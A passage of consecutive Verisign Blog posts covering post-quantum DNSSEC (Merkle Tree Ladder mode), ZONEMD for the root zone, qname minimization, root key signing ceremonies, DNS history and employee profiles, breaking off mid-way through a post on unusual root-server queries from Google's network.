With this tradeoff in mind, Verisign’s post-quantum research team has explored ways to address the size impact, particularly to DNSSEC, arriving at a construction we call a Merkle Tree Ladder (MTL), a generalization of a single-rooted Merkle tree (see Figure 2). We have also defined a technique that we call the Merkle Tree Ladder mode of operation for using the construction with an underlying signature algorithm.
Similar to current deployments of public-key cryptography, MTL mode combines processes with complementary properties to balance performance and other criteria (see Table 1). In particular, in MTL mode, rather than signing individual messages with a post-quantum signature algorithm, ladders comprised of one or more Merkle tree nodes are signed using the post-quantum algorithm. Individual messages are then authenticated relative to the ladders using Merkle authentication paths.
Criterion to Achieve | Initial Design with a Single Process | Improved Design Combining Complementary Processes | Benefit |
Public-Key Property for Encryption | – Encrypt Individual Messages with Public-Key Algorithm | – Establish Symmetric Keys Using Public-Key Algorithm – Encrypt Multiple Messages Using Each Symmetric Key |
– Amortize Cost of Public-Key Operations Across Multiple Messages |
Post-Quantum Property for Signatures | – Sign Individual Messages with Post-Quantum Algorithm | – Sign Merkle Tree Ladders using Post-Quantum Algorithm – Authenticate Multiple Messages Relative to Each Signed Ladder |
– Amortize Size of Post-Quantum Signature Across Multiple Messages |
Although the signatures on the ladders might be relatively large, the ladders and their signatures are sent infrequently. In contrast, the Merkle authentication paths that are sent for each message are relatively short. The combination of the two processes maintains the post-quantum property while amortizing the size impact of the signatures across multiple messages. (Merkle tree constructions, being based on hash functions, are naturally post-quantum.)
The two-part approach for public-key algorithms has worked well in practice. In Transport Layer Security, symmetric keys are established in occasional handshake operations, which may be more expensive. The symmetric keys are then used to encrypt multiple messages within a session without further overhead for key establishment. (They can also be used to start a new session).
We expect that a two-part approach for post-quantum signatures can similarly work well in an application like DNSSEC where verifiers are interested in authenticating a subset of messages from a large, evolving message series (e.g., DNS records).
In such applications, signed Merkle Tree Ladders covering a range of messages in the evolving series can be provided to a verifier occasionally. Verifiers can then authenticate messages relative to the ladders, given just a short Merkle authentication path.
Importantly, due to a property of Merkle authentication paths called backward compatibility, all verifiers can be given the same authentication path relative to the signer’s current ladder. This also helps with deployment in applications such as DNSSEC, since the authentication path can be published in place of a traditional signature. An individual verifier may verify the authentication path as long as the verifier has a previously signed ladder covering the message of interest. If not, then the verifier just needs to get the current ladder.
As reported in our presentation on MTL mode at the RSA Conference Cryptographers’ Track in April 2023, our initial evaluation of the expected frequency of requests for MTL mode signed ladders in DNSSEC is promising, suggesting that a significant reduction in effective signature size impact can be achieved.
To facilitate more public evaluation of MTL mode, Verisign’s post-quantum research team last week published the Internet-Draft “Merkle Tree Ladder Mode (MTL) Signatures.” The draft provides the first detailed, interoperable specification for applying MTL mode to a signature scheme, with SPHINCS+ as an initial example.
We chose SPHINCS+ because it is the most conservative of the NIST PQC algorithms from a cryptographic perspective, being hash-based and stateless. It is arguably most suited to be one of the algorithms in a long-term deployment of a critical infrastructure service like DNSSEC. With this focus, the specification has a “SPHINCS+-friendly” style. Implementers familiar with SPHINCS+ will find similar notation and constructions as well as common hash function instantiations. We are open to adding other post-quantum signature schemes to the draft or other drafts in the future.
Publishing the Internet-Draft is a first step toward the goal of standardizing a mode of operation that can reduce the size impact of post-quantum signature algorithms.
In support of this goal, Verisign also announced this week a public, royalty-free license to certain intellectual property related to the Internet-Draft published last week. Similar to other intellectual property rights declarations the company has made, we have announced a “Standards Development Grant” which provides the listed intellectual property under royalty-free terms for the purpose of facilitating standardization of the Internet-Draft we published on July 10, 2023. (The IPR declaration gives the official language.)
We expect to release an open-source implementation of the Internet-Draft soon, and, later this year, to publish an Internet-Draft on using MTL mode signatures in DNSSEC.
With these contributions, we invite implementers to take part in the next step toward standardization: evaluating initial versions of MTL mode to confirm whether they indeed provide practical advantages in specific use cases.
DNSSEC continues to be an important part of the internet’s infrastructure, providing cryptographic verification of information associated with the unique, stable identifiers in this ubiquitous namespace. That is why preparing for an eventual transition to post-quantum algorithms for DNSSEC has been and continues to be a key research and development activity at Verisign, as evidenced by our work on MTL mode and post-quantum DNSSEC more generally.
Our goal is that with a technique like MTL mode in place, protocols like DNSSEC can preserve the security characteristics of a pre-quantum environment while minimizing the operational impact of larger signatures in a post-quantum world.
In a later blog post, we’ll share more details on some upcoming changes to DNSSEC, and how these changes will provide both security and operational benefits to DNSSEC in the near term.
Verisign plans to continue to invest in research and standards development in this area, as we help prepare for a post-quantum future.
The post Next Steps in Preparing for Post-Quantum DNSSEC appeared first on Verisign Blog.
For Murray Green, working for a company that is a steward of critical internet infrastructure is a mission that he can get behind. Green, a senior engineering manager at Verisign, is a U.S. Army veteran who served during Operation Desert Storm and sees stewardship as a lifelong mission. In both roles, he has stayed focused on the success of the mission and cultivating great teamwork.
Teamwork is something that Laura Street, a software engineer and U.S. Air Force veteran, came to appreciate through her military service. It was then that she learned to appreciate how people from different backgrounds can work together on missions by finding their commonalities.
While military and civilian roles are very different, Verisign appeals to many veterans because of the mission-driven nature of the work we do.
Green and Street are two of the many veterans who have chosen to apply their military experience in a civilian career at Verisign. Both say that the work is not only rewarding to them, but to anyone who depends on Verisign’s commitment in helping to maintain the security, stability, and resiliency of the Domain Name System (DNS) and the internet.
At Verisign, we celebrate Military Appreciation Month by paying tribute to those who have served and recognizing how fortunate we are to work alongside amazing veterans whose contributions to our work provide enormous value.
Before joining the military, Murray Green studied electrical engineering but soon realized that his true passion was computer science. Looking for a way to pay for school and explore and excel as a Programmer Analyst, he turned to the U.S. Army.
He served more than four years at the Walter Reed Army Medical Center in Washington as the sole programmer for military personnel, using a proprietary language to maintain a reporting system that supplied data analysis. It was a role that helped him recognize the importance of data to any mission – whether for the U.S. Army or a company like Verisign.
At Walter Reed, he helped usher in the age of client-server computing, which dramatically reduced data processing time. “Around this time, personal computers connected to mini servers were just coming online so, using this new technology, I was able to unload data from the mainframe and bring it down to minicomputers running programs locally, which resulted in tasks being completed without the wait times associated with conventional mainframe computing,” he said. “I was there at the right time.”
His work led him to receive the Meritorious Service Medal, recognizing his expertise in the proprietary programming language that was used to assist in preparation for Operation Desert Storm, the first mobilization of U.S. Army personnel since Vietnam.
In the military, he also came to understand the importance of leadership – “providing purpose, direction, and motivation to accomplish the mission and improve the organization.”
Green has been at Verisign for over 20 years, starting off in the registry side of the business. In that role, he helped maintain the .com/.net top level-domain (TLD) name database, which at the time, held 5 million domain names. Today, he still oversees this database, managing a highly skilled team that has helped provide uninterrupted resolution service for .com and .net for over a quarter of a century.
Street had been in medical school, looking for a way to pay for her continued education, when she heard about the military’s Health Professional Scholarship Program and turned to the U.S. Air Force.
“I met some terrific people in the military,” she said. “My favorite experiences involved working with people who cared about others and were able to motivate them with positivity.” But it was the sense of teamwork she encountered in the military that left a lasting impression.
“There’s a sense of accountability and concern for others,” she said. “You help one another.”
While working in the Education and Training department, she had been working with a support team to troubleshoot a video that wasn’t loading properly and was impressed with how the developers worked to fix the problem. She immediately took an interest in programming and enrolled in night classes at a local community college. After completing her service in the U.S. Air Force, she went back to school to pursue a bachelor’s degree in computer science.
She’s been at Verisign for two years and, while the job itself is rewarding because it taps into so many of her interests – from Java programming to network protection and packet analysis – it was the chemistry with the team that was most enticing about the role.
“I felt as at-ease as one can possibly feel during a technical interview,” she said. “I got the sense that these were people who I would want to work with.
Street credits the military for teaching her valuable communication and teamwork skills that she continues to apply in her role, which focuses on keeping the .com and .net top-level-domains available around the clock, around the world.
Both Green and Street encourage service members to stay focused on the success of their personal missions and the teamwork they learned in the military, and to leverage those skills in the civilian world. Use your service as a selling point and understand that companies value that background more than you think, they said.
“Being proud of the service we provide to others and paying attention to details allows us at Verisign to make a global difference,” Green said. “The veterans on our team bring an incredible skillset that is highly valued here. I know that I’m a part of an incredible team at Verisign.”
Verisign is proud to create career opportunities where veterans can apply their military training. To learn more about our current openings, visit Verisign Careers.
The post Verisign Honors Vets in Technology For Military Appreciation Month appeared first on Verisign Blog.
The Domain Name System (DNS) root zone will soon be getting a new record type, called ZONEMD, to further ensure the security, stability, and resiliency of the global DNS in the face of emerging new approaches to DNS operation. While this change will be unnoticeable for the vast majority of DNS operators (such as registrars, internet service providers, and organizations), it provides a valuable additional layer of cryptographic security to ensure the reliability of root zone data.
In this blog, we’ll discuss these new proposals, as well as ZONEMD. We’ll share deployment plans, how they may affect certain users, and what DNS operators need to be aware of beforehand to ensure little-to-no disruptions.
The DNS root zone is the starting point for most domain name lookups on the internet. The root zone contains delegations to nearly 1,500 top-level domains, such as .com, .net, .org, and many others. Since its inception in 1984, various organizations known collectively as the Root Server Operators have provided the service for what we now call the Root Server System (RSS). In this system, a myriad of servers respond to approximately 80 billion root zone queries each day.
While the RSS continues to perform this function with a high degree of dependability, there are recent proposals to use the root zone in a slightly different way. These proposals create some efficiencies for DNS operators, but they also introduce new challenges.
In 2020, the Internet Engineering Task Force (IETF) published RFC 8806, titled “Running a Root Server Local to a Resolver.” Along the same lines, in 2021 the Internet Corporation for Assigned Names and Numbers (ICANN) Office of the Chief Technology Officer published OCTO-027, titled “Hyperlocal Root Zone Technical Analysis.” Both proposals share the idea that recursive name servers can receive and load the entire root zone locally and respond to root zone queries directly.
But in a scenario where the entire root zone is made available to millions of recursive name servers, a new question arises: how can consumers of zone data verify that zone content has not been modified before reaching their systems?
One might imagine that DNS Security Extensions (DNSSEC) could help. However, while the root zone is indeed signed with DNSSEC, most of the records in the zone are considered non-authoritative (i.e., all the NS and glue records) and therefore do not have signatures. What about something like a Pretty Good Privacy (PGP) signature on the root zone file? That comes with its own challenge: in PGP, the detached signature is easily separated from the data. For example, there is no way to include a PGP signature over DNS zone transfer, and there is no easy way to know which version of the zone goes with the signature.
A solution to this problem comes from RFC 8976. Led by Verisign and titled “Message Digest for DNS Zones” (known colloquially as ZONEMD), this protocol calls for a cryptographic digest of the zone data to be embedded into the zone itself. This ZONEMD record can then be signed and verified by consumers of the zone data. Here’s how it works:
Each time a zone is updated, the publisher calculates the ZONEMD record by sorting and canonicalizing all the records in the zone and providing them as input to a message digest function. Sorting and canonicalization are the same as for DNSSEC. In fact, the ZONEMD calculation can be performed at the same time the zone is signed. Digest calculation necessarily excludes the ZONEMD record itself, so the final step is to update the ZONEMD record and its signatures.
A recipient of a zone that includes a ZONEMD record repeats the same calculation and compares its calculated digest value with the published digest. If the zone is signed, then the recipient can also validate the correctness of the published digest. In this way, recipients can verify the authenticity of zone data before using it.
A number of open-source DNS software products now, or soon will, include support for ZONEMD verification. These include Unbound (version 1.13.2), NSD (version 4.3.4), Knot DNS (version 3.1.0), PowerDNS Recursor (version 4.7.0) and BIND (version 9.19).
Verisign, ICANN, and the Root Server Operators are taking steps to ensure that the addition of the ZONEMD record in no way impacts the ability of the root server system to receive zone updates and to respond to queries. As a result, most internet users are not affected by this change.
Anyone using RFC 8806, or a similar technique to load root zone data into their local resolver, is unlikely to be affected as well. Software products that implement those features should be able to fully process a zone that includes the new record type, especially for reasons described below. Once the record has been added, users can take advantage of ZONEMD verification to ensure root zone data is authentic.
Users most likely to be affected are those that receive root zone data from the internic.net servers (or some other source) and use custom software to parse the zone file. Depending on how such custom software is designed, there is a possibility that it will treat the new ZONEMD record as unexpected and lead to an error condition. Key objectives of this blog post are to raise awareness of this change, provide ample time to address software issues, and minimize the likelihood of disruptions for such users.
In 2020, Verisign asked the Root Zone Evolution Review Committee (RZERC) to consider a proposal for adding data protections to the root zone using ZONEMD. In 2021, the RZERC published its recommendations in RZERC003. One of those recommendations was for Verisign and ICANN to develop a deployment plan and make the community aware of the plan’s details. That plan is summarized in the remainder of this blog post.
One attribute of a ZONEMD record is the choice of a hash algorithm used to create the digest. RFC 8976 defines two standard hash algorithms – SHA-384 and SHA-512 – and a range of “private-use” algorithms.
Initially, the root zone’s ZONEMD record will have a private-use hash algorithm. This allows us to first include the record in the zone without anyone worrying about the validity of the digest values. Since the hash algorithm is from the private-use range, a consumer of the zone data will not know how to calculate the digest value. A similar technique, known as the “Deliberately Unvalidatable Root Zone,” was utilized when DNSSEC was added to the root zone in 2010.
After a period of more than two months, the ZONEMD record will transition to a standard hash algorithm.
SHA-384 has been selected for the initial implementation for compatibility reasons.
The developers of BIND implemented the ZONEMD protocol based on an early Internet-Draft, some time before it was published as an RFC. Unfortunately, the initial BIND implementation only accepts ZONEMD records with a digest length of 48 bytes (i.e., the SHA-384 length). Since the versions of BIND with this behavior are in widespread use today, use of the SHA-512 hash algorithm would likely lead to problems for many BIND installations, possibly including some Root Server Operators.
Distribution of the zone between the Root Zone Maintainer and Root Server Operators primarily takes place via the DNS zone transfer protocol. In this protocol, zone data is transmitted in “wire format.”
The root zone is also stored and served as a file on the internic.net FTP and web servers. Here, the zone data is in “presentation format.” The ZONEMD record will appear in these files using its native presentation format. For example:
. 86400 IN ZONEMD 2021101902 1 1 ( 7d016e7badfd8b9edbfb515deebe7a866bf972104fa06fec
e85402cc4ce9b69bd0cbd652cec4956a0f206998bfb34483 )
Some users of zone data received from the FTP and web servers might currently be using software that does not recognize the ZONEMD presentation format. These users might experience some problems when the ZONEMD record first appears. We did consider using a generic record format; however, in consultation with ICANN, we believe that the native format is a better long-term solution.
Currently, we are targeting the initial deployment of ZONEMD in the root zone for September 13, 2023. As previously stated, the ZONEMD record will be published first with a private-use hash algorithm number. We are targeting December 6, 2023, as the date to begin using the SHA-384 hash algorithm, at which point the root zone ZONEMD record will become verifiable.
Deploying ZONEMD in the root zone helps to increase the security, stability, and resiliency of the DNS. Soon, recursive name servers that choose to serve root zone data locally will have stronger assurances as to the zone’s validity.
If you’re interested in following the ZONEMD deployment progress, please look for our announcements on the DNS Operations mailing list.
The post Adding ZONEMD Protections to the Root Zone appeared first on Verisign Blog.
Over the past several years, domain name queries – a critical element of internet communication – have quietly become more secure, thanks, in large part, to a little-known set of technologies that are having a global impact. Verisign CTO Dr. Burt Kaliski covered these in a recent Internet Protocol Journal article, and I’m excited to share more about the role Verisign has performed in advancing this work and making one particular technology freely available worldwide.
The Domain Name System (DNS) has long followed a traditional approach of answering queries, where resolvers send a query with the same fully qualified domain name to each name server in a chain of referrals. Then, they generally apply the final answer they receive only to the domain name that was queried for in the original request.
But recently, DNS operators have begun to deploy various “minimization techniques” – techniques aimed at reducing both the quantity and sensitivity of information exchanged between DNS ecosystem components as a means of improving DNS security. Why the shift? As we discussed in a previous blog, it’s all in the interest of bringing the process closer to the “need-to-know” security principle, which emphasizes the importance of sharing only the minimum amount of information required to complete a task or carry out a function. This effort is part of a general, larger movement to reduce the disclosure of sensitive information in our digital world.
As part of Verisign’s commitment to security, stability, and resiliency of the global DNS, the company has worked both to develop qname minimization techniques and to encourage the adoption of DNS minimization techniques in general. We believe strongly in this work since these techniques can reduce the sensitivity of DNS data exchanged between resolvers and both root and TLD servers without adding operational risk to authoritative name server operations.
To help advance this area of technology, in 2015, Verisign announced a royalty-free license to its qname minimization patents in connection with certain Internet Engineering Task Force (IETF) standardization efforts. There’s been a steady increase in support and deployment since that time; as of this writing, roughly 67% of probes were utilizing qname-minimizing resolvers, according to statistics hosted by NLnet Labs. That’s up from just 0.7% in May 2017 – a strong indicator of minimization techniques’ usefulness to the community. At Verisign, we are seeing similar trends with approximately 65% of probes utilizing qname-minimizing resolvers in queries with two labels at .com and .net authoritative name servers, as shown in Figure 1 below.
Kaliski’s article, titled “Minimized DNS Resolution: Into the Penumbra,” explores several specific minimization techniques documented by the IETF, reports on their implementation status, and discusses the effects of their adoption on DNS measurement research. An expanded version of the article can be found on the Verisign website.
This piece is just one of the latest to demonstrate Verisign’s continued investment in research and standards development in the DNS ecosystem. As a company, we’re committed to helping shape the DNS of today and tomorrow, and we recognize this is only possible through ongoing contributions by dedicated members of the internet infrastructure community – including the team here at Verisign.
Read more about Verisign’s contributions to this area:
Minimum Disclosure: What Information Does a Name Server Need to Do Its Job? (blog)
Maximizing Qname Minimization: A New Chapter in DNS Protocol Evolution (blog)
Information Protection for the Domain Name System: Encryption and Minimization (blog)
The post Minimized DNS Resolution: Into the Penumbra appeared first on Verisign Blog.
Every few months, an important ceremony takes place. It’s not splashed all over the news, and it’s not attended by global dignitaries. It goes unnoticed by many, but its effects are felt across the globe. This ceremony helps make the internet more secure for billions of people.
This unique ceremony began in 2010 when Verisign, the Internet Corporation for Assigned Names and Numbers (ICANN), and the U.S. Department of Commerce’s National Telecommunications and Information Administration collaborated – with input from the global internet community – to deploy a technology called Domain Name System Security Extensions (DNSSEC) to the Domain Name System (DNS) root zone in a special ceremony. This wasn’t a one-off occurrence in the history of the DNS, though. Instead, these organizations developed a set of processes, procedures, and schedules that would be repeated for years to come. Today, these recurring ceremonies help ensure that the root zone is properly signed, and as a result, the DNS remains secure, stable, and resilient.
In this blog, we take the opportunity to explain these ceremonies in greater detail and describe the critical role that Verisign is honored to perform.
DNSSEC is a series of technical specifications that allow operators to build greater security into the DNS. Because the DNS was not initially designed as a secure system, DNSSEC represented an essential leap forward in securing DNS communications. Deploying DNSSEC allows operators to better protect their users, and it helps to prevent common threats such as “man-in-the-middle” attacks. DNSSEC works by using public key cryptography, which allows zone operators to cryptographically sign their zones. This allows anyone communicating with and validating a signed zone to know that their exchanges are genuine.
The root zone, like most signed zones, uses separate keys for zone signing and for key signing. The Key Signing Key (KSK) is separate from the Zone Signing Key (ZSK). However, unlike most zones, the root zone’s KSK and ZSK are operated by different organizations; ICANN serves as the KSK operator and Verisign as the ZSK operator. These separate roles for DNSSEC align naturally with ICANN as the Root Zone Manager and Verisign as the Root Zone Maintainer.
In practice, the KSK/ZSK split means that the KSK only signs the DNSSEC keys, and the ZSK signs all the other records in the zone. Signing with the KSK happens infrequently – only when the keys change. However, signing with the ZSK happens much more frequently – whenever any of the zone’s other data changes.
Something to keep in mind before we go further: remember that DNSSEC utilizes public key cryptography, in which keys have both a private and public component. The private component is used to generate signatures and must be guarded closely. The public component is used to verify signatures and can be shared openly. Good cryptographic hygiene says that these keys should be changed (or “rolled”) periodically.
In DNSSEC, changing a KSK is generally difficult, whereas changing a ZSK is relatively easy. This is especially true for the root zone where a KSK rollover requires all validating recursive name servers to update their copy of the trust anchor. Whereas the first and only KSK rollover to date happened after a period of eight years, ZSK rollovers take place every three months. Not coincidentally, this is also how often root zone key signing ceremonies take place.
The notion of holding a “ceremony” for such an esoteric technical function may seem strange, but this ceremony is very different from what most people are used to. Our common understanding of the word “ceremony” brings to mind an event with speeches and formal attire. But in this case, the meaning refers simply to the formality and ritual aspects of the event.
There are two main reasons for holding key signing ceremonies. One is to bring participants together so that everyone may transparently witness the process. Ceremony participants include ICANN staff, Verisign staff, Trusted Community Representatives (TCRs), and external auditors, plus guests on occasion.
The other important reason, of course, is to generate DNSSEC signatures. Occasionally other activities take place as well, such as generating new keys, retiring equipment, and changing TCRs. In this post, we’ll focus only on the signature generation procedures.
A month or two before each ceremony, Verisign generates a file called the Key Signing Request (KSR). This is an XML document which includes the set of public key records (both KSK and ZSK) to be signed and then used during the next calendar quarter. The KSR is securely transmitted from Verisign to the Internet Assigned Numbers Authority (IANA), which is a function of ICANN that performs root zone management. IANA securely stores the KSR until it is needed for the upcoming key signing ceremony.
Each quarter is divided into nine 10-day “slots” (for some quarters, the last slot is extended by a day or two) and the XML file contains nine key “bundles” to be signed. Each bundle, or slot, has a signature inception and expiration timestamp, such that they overlap by at least five days. The first and last slots in each quarter are used to perform ZSK rollovers. During these slots we publish two ZSKs and one KSK in the root zone.
The root zone KSK private component is held inside secure Hardware Security Modules (HSMs). These HSMs are stored inside locked safes, which in turn are kept inside locked rooms. At a key signing ceremony, the HSMs are taken out of their safes and activated for use. This all occurs according to a pre-defined script with many detailed steps, as shown in the figure below.
Also stored inside the safe is a laptop computer, its operating system on non-writable media (i.e., DVD), and a set of credentials for the TCRs, stored on smart cards and locked inside individual safe deposit boxes. Once all the necessary items are removed from the safes, the equipment can be turned on and activated.
The laptop computer is booted from its operating system DVD and the HSM is connected via Ethernet for data transfer and serial port for console logging. The TCR credentials are used to activate the HSM. Once activated, a USB thumb drive containing the KSR file is connected to the laptop and the signing program is started.
The signing program reads the KSR, validates it, and then displays information about the keys about to be signed. This includes the signature inception and expiration timestamps, and the ZSK key tag values.
Validate and Process KSR /media/KSR/KSK46/ksr-root-2022-q4-0.xml...
# Inception Expiration ZSK Tags KSK Tag(CKA_LABEL)
1 2022-10-01T00:00:00 2022-10-22T00:00:00 18733,20826
2 2022-10-11T00:00:00 2022-11-01T00:00:00 18733
3 2022-10-21T00:00:00 2022-11-11T00:00:00 18733
4 2022-10-31T00:00:00 2022-11-21T00:00:00 18733
5 2022-11-10T00:00:00 2022-12-01T00:00:00 18733
6 2022-11-20T00:00:00 2022-12-11T00:00:00 18733
7 2022-11-30T00:00:00 2022-12-21T00:00:00 18733
8 2022-12-10T00:00:00 2022-12-31T00:00:00 18733
9 2022-12-20T00:00:00 2023-01-10T00:00:00 00951,18733
...PASSED.
It also displays an SHA256 hash of the KSR file and a corresponding “PGP (Pretty Good Privacy) Word List.” The PGP Word List is a convenient and efficient way of verbally expressing hexadecimal values:
SHA256 hash of KSR:
ADCE9749F3DE4057AB680F2719B24A32B077DACA0F213AD2FB8223D5E8E7CDEC
>> ringbolt sardonic preshrunk dinosaur upset telephone crackdown Eskimo rhythm gravity artist celebrate bedlamp pioneer dogsled component ruffled inception surmount revenue artist Camelot cleanup sensation watchword Istanbul blowtorch specialist trauma truncated spindle unicorn <<
At this point, a Verisign representative comes forward to verify the KSR. The following actions then take place:
The signing program outputs a new XML document, called the Signed Key Response (SKR). This document contains signatures over the DNSKEY resource record sets in each of the nine slots. The SKR is saved to a USB thumb drive and given to a member of the Root Zone KSK Operations Security team. Usually sometime the next day, IANA securely transmits the SKR back to Verisign. Following several automatic and manual verification steps, the signature data is imported into Verisign’s root zone management system for use at the appropriate times in the next calendar quarter.
Keeping the internet’s DNS secure, stable, and resilient is a crucial aspect of Verisign’s role as the Root Zone Maintainer. We are honored to participate in the key signing ceremonies with ICANN and the TCRs and do our part to help the DNS operate as it should.
For more information on root key signing ceremonies, visit the IANA website. Visitors can watch video recordings of previous ceremonies and even sign up to witness the next ceremony live. It’s a great resource, and a unique opportunity to take part in a process that helps keep the internet safe for all.
The post Verisign’s Role in Securing the DNS Through Key Signing Ceremonies appeared first on Verisign Blog.
In 1987, CompuServe introduced GIF images, Steve Wozniak left Apple and IBM introduced the PS/2 personal computer with improved graphics and a 3.5-inch diskette drive. Behind the scenes, one more critical piece of internet infrastructure was quietly taking form to help establish the internet we know today.
November of 1987 saw the establishment of the Domain Name System protocol suite as internet standards. This was a development that not only would begin to open the internet to individuals and businesses globally, but also would arguably redefine communications, commerce and access to information for future generations.
Today, the DNS continues to be critical to the operation of the internet as a whole. It has a long and strong track record thanks to the work of the internet’s pioneers and the collaboration of different groups to create volunteer standards.
Let’s take a look back at the journey of the DNS over the years.
Prior to 1987, the internet was primarily used by government agencies and members of academia. Back then, the Network Information Center, managed by SRI International, manually maintained a directory of hosts and networks. While the early internet was transformative and forward-thinking, not everyone had access to it.
During that same time period, the U.S. Advanced Research Projects Agency Network, the forerunner to the internet we know now, was evolving into a growing network environment, and new naming and addressing schemes were being proposed. Seeing that there were thousands of interested institutions and companies wanting to explore the possibilities of networked computing, a group of ARPA networking researchers realized that a more modern, automated approach was needed to organize the network’s naming system for anticipated rapid growth.
Two Request for Comments documents, numbered RFC 1034 and RFC 1035, were published in 1987 by the informal Network Working Group, which soon after evolved into the Internet Engineering Task Force. Those RFCs, authored by computer scientist Paul V. Mockapetris, became the standards upon which DNS implementations have been built. It was Mockapetris, inducted into the Internet Hall of Fame in 2012, who specifically suggested a name space where database administration was distributed but could also evolve as needed.
In addition to allowing organizations to maintain their own databases, the DNS simplified the process of connecting a name that users could remember with a unique set of numbers – the Internet Protocol address – that web browsers needed to navigate to a website using a domain name. By not having to remember a seemingly random string of numbers, users could easily get to their intended destination, and more people could access the web. This has worked in a logical way for all internet users – from businesses large and small to everyday people – all around the globe.
With these two aspects of the DNS working together – wide distribution and name-to-address mapping – the DNS quickly took shape and developed into the system we know today.
Thirty-five years of DNS development and progress is attributable to the collaboration of multiple stakeholders and interest groups – academia, technical community, governments, law enforcement and civil society, plus commercial and intellectual property interests – who continue even today to bring crucial perspectives to the table as it relates to the evolution of the DNS and the internet. These perspectives have lent themselves to critical security developments in the DNS, from assuring protection of intellectual property rights to the more recent stakeholder collaborative efforts to address DNS abuse.
Other major collaborative achievements involve the IETF, which has no formal membership roster or requirements, and is responsible for the technical standards that comprise the internet protocol suite, and the Internet Corporation for Assigned Names and Numbers, which plays a central coordination role in the bottom-up multistakeholder system governing the global DNS. Without constructive and productive voluntary collaboration, the internet as we know it simply isn’t possible.
Indeed, these cooperative efforts marshaled a brand of collaboration known today as “rough consensus.” That term, originally “rough consensus and running code,” gave rise to a more dynamic collaboration process than the “100% consensus from everyone” model. In fact, the term was adopted by the IETF in the early days of establishing the DNS to describe the formation of the dominant view of the working group and the need to quickly implement new technologies, which doesn’t always allow for lengthy discussions and debates. This approach is still in use today, proving its usefulness and longevity.
As we look back on how the DNS came to be and the processes that have kept it reliably running, it’s important to recognize the work done by the organizations and individuals that make up this community. We must also remember that the efforts continue to be powered by voluntary collaborations.
Commemorating anniversaries such as 35 years of the DNS protocol allows the multiple stakeholders and communities to pause and reflect on the enormity of the work and responsibility before us. Thanks to the pioneering minds who conceived and built the early infrastructure of the internet, and in particular to Paul Mockapetris’s fundamental contribution of the DNS protocol suite, the world has been able to establish a robust global economy that few could ever have imagined so many years ago.
The 35th anniversary of the publication of RFCs 1034 and 1035 reminds us of the contributions that the DNS has made to the growth and scale of what we know today as “the internet.” That’s a moment worth celebrating.
The post Celebrating 35 Years of the DNS Protocol appeared first on Verisign Blog.
Today, as the world celebrates International Women in Engineering Day, we recognize and honor women engineers at Verisign, whose own stories have helped shape dreams and encouraged young women and girls to take up engineering careers.
Here are three of their stories:
When Shama Khakurel was in high school, she aspired to join the medical field. But she quickly realized that classes involving math or engineering came easiest to her, much more so than her work in biology or other subjects. It wasn’t until she took a summer computer programming course called “Lotus and dBase Programming” that she realized her career aspirations had officially changed; from that point on, she wanted to be an engineer.
In the nearly 20 years she’s been at Verisign, she’s expanded her skills, challenged herself, pursued opportunities – and always had the support of managers who mentored her along the way.
“Verisign has given me every opportunity to grow,” Shama says. And even though she continues to “learn something new every day,” she also provides mentorship to younger engineering employees.
Women tend to shy away from engineering roles, she says, because they think that math and science are harder subjects. “They seem to follow and believe that myth, but there is a lot of opportunity for a woman in this field.”
For Vinaya Shenoy, an engineering manager who has worked for Verisign for 17 years, a passion for math and science at a young age steered her toward a career in computer science engineering.
She draws inspiration from other women who are industry leaders and immigrants from India and who made it to top rank with their determination and leadership skills. She credits their stories with helping her see what all women are capable of, especially in unconventional or unexpected areas.
“Engineering is not just coding. There are a lot of areas within engineering that you can explore and pursue,” she says. “If problem-solving and creating are your passions, you can harness the power of technology to solve problems and give back to the community.”
Tuyet Vuong is one of those people who enjoys problem-solving. As a young girl and the child of two physics teachers, she would often build small gadgets – perhaps her own clock or a small fan – from things she would find around the house.
Today, the challenges are bigger and have a greater impact, and she still finds herself enjoying them.
“Engineering is a fun, exciting and rewarding discipline where you can explore and build new things that are helpful to society,” says Tuyet. And sharing the insights and experiences of so many talented people – both men and women – is what makes the role that much more rewarding.
That sense of fulfillment also comes from breaking down stereotypes, such as the attitudes about women only being suitable for a limited number of careers when she was growing up in Vietnam. That’s why she’s a firm believer that mentoring and encouraging young women engineers isn’t just the responsibility of other women.
“The effort should come from both genders,” she says. “The effort shouldn’t come from women alone.”
At Verisign, we see the real impact of all our women engineers’ contributions when it comes to ensuring that the internet is secure, stable and resilient. Today and every day, we celebrate Verisign’s women engineers. We thank you for all you’ve done and everything you’re yet to accomplish.
If you’re interested in pursuing your passion for engineering, view our open career opportunities here.
The post Celebrating Women Engineers Today and Every Day at Verisign appeared first on Verisign Blog.
This blog was also published by APNIC.
With so much traffic on the global internet day after day, it’s not always easy to spot the occasional irregularity. After all, there are numerous layers of complexity that go into the serving of webpages, with multiple companies, agencies and organizations each playing a role.
That’s why when something does catch our attention, it’s important that the various entities work together to explore the cause and, more importantly, try to identify whether it’s a malicious actor at work, a glitch in the process or maybe even something entirely intentional.
That’s what occurred last year when Internet Corporation for Assigned Names and Numbers staff and contractors were analyzing names in Domain Name System queries seen at the ICANN Managed Root Server, and the analysis program ran out of memory for one of their data files. After some investigating, they found the cause to be a very large number of mysterious queries for unique names such as f863zvv1xy2qf.surgery, bp639i-3nirf.hiphop, qo35jjk419gfm.net and yyif0aijr21gn.com.
While these were queries for names in existing top-level domains, the first label consisted of 12 or 13 random-looking characters. After ICANN shared their discovery with the other root server operators, Verisign took a closer look to help understand the situation.
One of the first things we noticed was that all of these mysterious queries were of type NS and came from one autonomous system network, AS 15169, assigned to Google LLC. Additionally, we confirmed that it was occurring consistently for numerous TLDs. (See Fig. 1)
Although this phenomenon was newly uncovered, analysis of historical data showed these traffic patterns actually began in late 2019. (See Fig. 2)
Perhaps the most interesting discovery, however, was that these specific query names were not also seen at the .com and .net name servers operated by Verisign. The data in Figure 3 shows the fraction of queried names that appear at A-root and J-root and also appear on the .com and .net name servers. For second-level labels of 12 and 13 characters, this fraction is essentially zero. The graphs also show that there appears to be queries for names with second-level label lengths of 10 and 11 characters, which are also absent from the TLD data.
The final mysterious aspect to this traffic is that it deviated from our normal expectation of caching. Remember that these are queries to a root name server, which returns a referral to the delegated name servers for a TLD. For example, when a root name server receives a query for yyif0aijr21gn.com, the response is a list of the name servers that are authoritative for the .com zone. The records in this response have a time to live of two days, meaning that the recursive name server can cache and reuse this data for that amount of time.
